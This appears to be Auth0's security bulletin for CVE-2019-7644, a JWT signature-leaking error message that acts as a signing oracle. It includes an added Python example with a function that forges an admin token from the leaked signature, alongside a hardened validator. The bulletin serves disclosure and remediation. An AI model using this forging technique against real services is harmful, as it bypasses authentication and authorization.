Auth0 Security Bulletin CVE-2019-7644

Published: February 15, 2019

CVE number: CVE-2019-7644

Credit: Conny Dahlgren, Security Researcher at DevilSec AB

Overview

All versions of the Auth0-WCF-Service-JWT NuGet package lower than 1.0.4 include sensitive information about the expected JWT signature in the error message emitted when JWT signature validation fails: the message reveals the signature the library itself computed for the submitted token.

This turns the error message into a signing oracle. An attacker submits a token carrying arbitrary claims and any signature, reads the expected signature out of the error, and resubmits the same header and payload with that signature, which the library then accepts. In this way attackers can forge tokens to bypass authentication and authorization mechanisms without ever learning the signing key.
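The following is an added example and not Auth0's or the library's code. It models the two behaviours described above in plain Python with an HS256 JWT: a leaky validator whose exception text echoes the expected signature (the exact wording of the real library's message is not reproduced here; the "Expected ... got ..." format is an assumption of this model), an attacker routine that uses that text as an oracle to forge an admin token, and a hardened validator that returns a generic error and so gives the attacker nothing. The secret key and claims are constructed for the demonstration.

```python
"""Added example (not the library's code): leaking the expected JWT
signature in a validation error is a signing oracle, and the fix."""
import base64
import hashlib
import hmac
import json
from typing import Callable, Optional

# Assumed server-side key; the attacker never sees it.
SECRET = b"server-side-secret-never-sent-to-clients"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign(signing_input: bytes, key: bytes) -> str:
    """HS256 signature over header.payload, base64url encoded."""
    return b64url(hmac.new(key, signing_input, hashlib.sha256).digest())


def make_token(claims: dict, key: bytes, signature: Optional[str] = None) -> str:
    """Build a JWT; if `signature` is given it is used verbatim (attacker path)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = signature if signature is not None else sign(signing_input, key)
    return f"{header}.{payload}.{sig}"


class InvalidSignature(Exception):
    pass


def validate_leaky(token: str, key: bytes) -> dict:
    """Models the pre-1.0.4 behaviour (message format is an assumption):
    the exception reveals the signature the server computed for this token."""
    header, payload, sig = token.split(".")
    expected = sign(f"{header}.{payload}".encode(), key)
    if not hmac.compare_digest(sig, expected):
        raise InvalidSignature(f"Invalid signature. Expected {expected} got {sig}")
    return json.loads(b64url_decode(payload))


def validate_fixed(token: str, key: bytes) -> dict:
    """Hardened: constant-time compare and a generic message, no oracle."""
    header, payload, sig = token.split(".")
    expected = sign(f"{header}.{payload}".encode(), key)
    if not hmac.compare_digest(sig, expected):
        raise InvalidSignature("Invalid signature")
    return json.loads(b64url_decode(payload))


def forge_via_oracle(claims: dict, server: Callable[[str], dict]) -> Optional[str]:
    """Attacker: submit the desired claims with a junk signature, pull the
    expected signature out of the error text, and resubmit with it.
    Returns the forged token, or None if the error leaks nothing."""
    probe = make_token(claims, b"", signature="AAAA")
    try:
        server(probe)
    except InvalidSignature as exc:
        msg = str(exc)
        if "Expected " in msg:
            leaked = msg.split("Expected ")[1].split(" ")[0]
            return make_token(claims, b"", signature=leaked)
    return None


if __name__ == "__main__":
    admin = {"sub": "attacker", "role": "admin"}  # constructed claims
    forged = forge_via_oracle(admin, lambda t: validate_leaky(t, SECRET))
    print("leaky validator, forged token accepted:",
          validate_fixed(forged, SECRET)["role"] == "admin")
    print("fixed validator, forgery possible:",
          forge_via_oracle(admin, lambda t: validate_fixed(t, SECRET)) is not None)
```

The attacker needs only one failed request per token to forge; no brute force and no knowledge of the key is involved, which is why the error text alone is the whole vulnerability. The hardened validator also uses `hmac.compare_digest` so the comparison does not leak the expected value through timing either.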

Am I affected?

You are affected by this vulnerability if both of the following conditions apply:

  • You use a version of the Auth0-WCF-Service-JWT NuGet package lower than 1.0.4
  • You show the signature verification exception message in the user interface or otherwise make it available to an attacker (for example through an API error response, logs, or diagnostic messages)

How do I fix this?

Developers using the Auth0-WCF-Service-JWT library need to upgrade to version 1.0.4 or later, which no longer includes the expected signature in the validation error message.

The updated package is available on NuGet.

Will this update impact my users?

No. This fix patches the library that your application runs, but will not impact your users, their current state, or any existing sessions.